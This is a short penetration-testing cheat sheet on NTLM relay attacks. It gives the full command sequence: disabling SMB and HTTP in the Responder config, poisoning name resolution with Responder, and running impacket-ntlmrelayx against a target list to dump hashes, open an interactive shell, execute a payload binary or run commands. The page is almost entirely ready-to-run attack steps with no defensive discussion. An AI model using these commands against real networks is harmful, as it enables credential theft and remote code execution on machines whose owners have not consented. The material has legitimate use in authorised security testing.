Skip to content

Relay Attacks

https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/

Relay captures hashes to target machine for various types of access. - Only works if SMB signing is disabled or "not required" - Relayed creds MUST be admin on the machine

Responder + ntlmrelayx

Edit responder conf: 

sudo nano /etc/responder/Responder.conf
SMB = On ---> Off
HTTP = on ---> Off
Make targets list 
echo "<TargetIP>" > targets.txt
Run responder 
sudo responder -I eth0 -wv
Start ntlmrelayx with any of these options

Dump hashes 

sudo impacket-ntlmrelayx -tf targets.txt -smb2support
Get semi-interactive smbexec bind shell (nc localhost 11000) 
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -i
Execute payload 
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -e payload.exe
Execute Command 
sudo impacket-ntlmrelayx -tf targets.txt -smb2support -c 'whoami'
Wait for auth attempt (or coerce auth attempt)